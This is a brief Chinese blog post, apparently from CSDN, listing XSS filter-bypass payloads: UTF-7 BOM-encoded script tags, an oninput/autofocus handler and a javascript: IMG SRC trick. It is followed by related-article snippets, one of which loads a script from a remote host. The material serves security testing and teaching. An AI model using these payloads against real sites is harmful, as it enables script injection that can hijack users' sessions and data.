XSS绕过

最新推荐文章于 2021-09-16 22:29:28 发布
最新推荐文章于 2021-09-16 22:29:28 发布
阅读量273 收藏
点赞数
分类专栏: xss 文章标签: web安全 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tony_jiajia/article/details/100131338
版权

1.将编码转换为utf-7编码,用于检测是否存在utf-7 BOM xss

按照RFC标准Header头设置的字符集优先于META和BOM等其他方式识别出的字符集,而BOM要求在文件的头几个字节。由于IE浏览器没有指定字符集的识别方式,加上常规的危险字符过滤机制,UTF-7编码中的字符集并不包含危险的字符,所以就绕过了常规的过滤机制,进行跨站脚本攻击。

payload:%2B/v8APA-script%2BAD4-alert%28/xss/%29%2BADw-/script%2BAD4-(utf-7全编码模式<script>alert(/xss/);</script>)

当请求头为post是,payload为+/v8APA-script+AD4-alert(/xss/)+ADw-/script+AD4-

 

2.<body οninput=alert(1)><input autofocus>

 

3.利用%0a绕过编码,多注意空参数,使用注释<!--

 

4.只含有左尖括号的payload:<IMG SRC=”javascript:alert(‘XSS’)”

 

gam0n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《CTF特训营》——跨站脚本攻击(XSS
PICACHU+++的博客
07-15 2245
跨站脚本攻击简称XSS,是一种网站应用程序漏洞,是代码注入漏洞的一种,攻击者可以通过这个漏洞向网页中注入恶意代码,导致用户浏览器加载网页、渲染HTML文档时执行攻击者代码。反射型XSS,存储型XSS,DOM型XSS输出在HTML属性中,输出在CSS代码中,输出在JavaScript中.......................................
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
【应用安全——XSS】——UTF-7 XSS
Fly_鹏程万里
02-22 1615
受影响浏览器版本为IE6,影响范围较小。 如果在Content-Type中没有设置charset,如下: Content-Type:text/html 在meta标签中也没有设置字符集 &lt;meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ /&gt; 就可以通过字符集抢占的方式使浏览器以UTF-7解析。...
XSS绕过技术
10-11
Cross-Site Scripting(XSS绕过技术,来自论坛:法克论坛,作者:bystand
绕过编码方式阻止XSS攻击的几个例子
weixin_30588675的博客
03-25 235
阻止攻击的常用方法是:在将HTML返回给Web浏览器之前,对攻击者输入的HTML进行编码。HTML编码使用一些没有特定HTML意义的字符来代替那些标记字符(如尖括号)。这些替代字符不会影响文本在web浏览器上的显示方式,仅仅用于阻止HTML渲染引擎将数据识别成HTML标记。这种方法能阻止一些XSS攻击,但是以下几种情况例外: 在Script块中插入: <script> ......
XSS 绕过常用语句
Mr.Huang_的博客
09-16 2713
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
XSS过滤绕过
qq_39654116的博客
01-17 4499
目录过滤测试示例输入在script标签中非常规的事件监听HREF内容可控变换JavaScript变换Vbscript变换输入在属性里JSONSVG标签浏览器bug常见标签利用link远程包含js文件javascript伪协议属性payload常用的payload各种alert伪协议Chrome XSS auditor bypass长度限制jquery sourceMappingURL图片名过期的payloadcssmarkdowniframeformmeta绕过过滤空格大小写混淆双写绕过字符拼接编码绕过编码
记录几种XSS绕过方式1
08-03
本文主要记录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,提高网站的安全性。 1. 服务端全局替换为空的特性: 当网站的过滤机制将某些特定字符如"onerror"或"script"替换为空时,攻击者可以利用...
使用无括号的XSS绕过CSP策略研究 .pdf
09-05
标题中的“使用无括号的XSS绕过CSP策略研究”是指在网络安全领域中,攻击者尝试利用一种特殊类型的跨站脚本(XSS)攻击来规避内容安全策略(Content Security Policy,简称CSP)的防御机制。CSP是一种有效的防止XSS...
第04篇:XSS三重URL编码绕过实例1
08-03
本文主要探讨了一个XSS三重URL编码绕过的实例,揭示了在某些情况下,简单的防御措施可能不足以阻止攻击。 首先,我们要理解XSS的基本概念。XSS攻击通常发生在Web应用程序未能正确过滤或转义用户输入的情况下。当...
第十二节 XSS 过滤器绕过-01
09-15
XSS 过滤器绕过技术详解 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的 Web 应用程序安全漏洞,攻击者可以通过插入恶意脚本来盗取用户信息、破坏网站操作等。为防止 XSS 攻击,开发者通常会使用 XSS 过滤...
第十六节 unicode绕过过滤触发XSS-01
09-15
Unicode绕过过滤触发XSS-01 Unicode绕过过滤触发XSS是指攻击者通过使用Unicode字符来绕过Web应用程序的输入验证和过滤机制,从而触发跨站脚本(XSS)攻击。下面将详细介绍Unicode绕过过滤触发XSS的原理和实现方法。...
anti-xss:AntiAntiXSS | 通过PHP防止跨站点脚本(XSS
05-02
跨站点脚本漏洞可能被攻击者用来绕过相同原产地策略之类的访问控制。截至2007年,在网站上进行的跨站点脚本编写约占Symantec记录的所有安全漏洞的84%。” 演示: 笔记: 使用 -不要直接使用GLOBAL-Array(例如$ _...
第十三节 利用CSS特性绕过XSS过滤-01
09-15
利用CSS特性绕过XSS过滤 在Web安全领域中,XSS(Cross-Site Scripting)是一种常见的攻击方式,它通过在目标网站中插入恶意脚本来攻击用户。为了防止XSS攻击,很多网站都部署了XSS过滤机制。但是,攻击者可以利用...
第十二节 利用IE特性绕过XSS过滤-01
09-15
XSS 攻击和 IE 特性绕过 XSS 过滤 XSS(Cross-Site Scripting),即跨站脚本攻击,是一种常见的 Web 应用安全漏洞。攻击者可以通过在目标网站中Inject恶意脚本,劫持用户会话,盗取敏感信息,甚至控制用户的浏览器...
如何解决UTF-7漏洞
caoliangbo的博客
07-25 1206
又有应用被扫描到这个漏洞了,这个漏洞太低调,经常被大家忽略。且遇到后找不到解决方案。 整理下。   1:设置HTTP RESPONSE : Content-Type:json   2:组织UTF-7 BOM 在response 的最前面加上换行或空格   3:组织页面里在&lt;meta&gt; 前设置chaset ...
XSS 注入
fanhaiwang520的专栏
09-04 2408
XSS注入的本质就是根据用户的输入,无形中生成一段可执行非法的js代码 常见的注入: 1.只有IE6和IE7   :UTF7-XSS 不防在IE6或者IE7下输入这样一段代码: +/v8 +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- 发现会生成这样一段代码:alert(document.location)
XSS插入绕过一些方式总结
热门推荐
煜铭2011
05-05 7万+
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作: <scr<script&g...
XSS绕过方式有哪些
最新发布
10-27
以下是一些XSS绕过方式: 1. HTML编码绕过:攻击者可以使用HTML编码绕过过滤器,例如使用<代替<,使用>代替>等。 2. JavaScript编码绕过:攻击者可以使用JavaScript编码绕过过滤器,例如使用%3C代替<,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值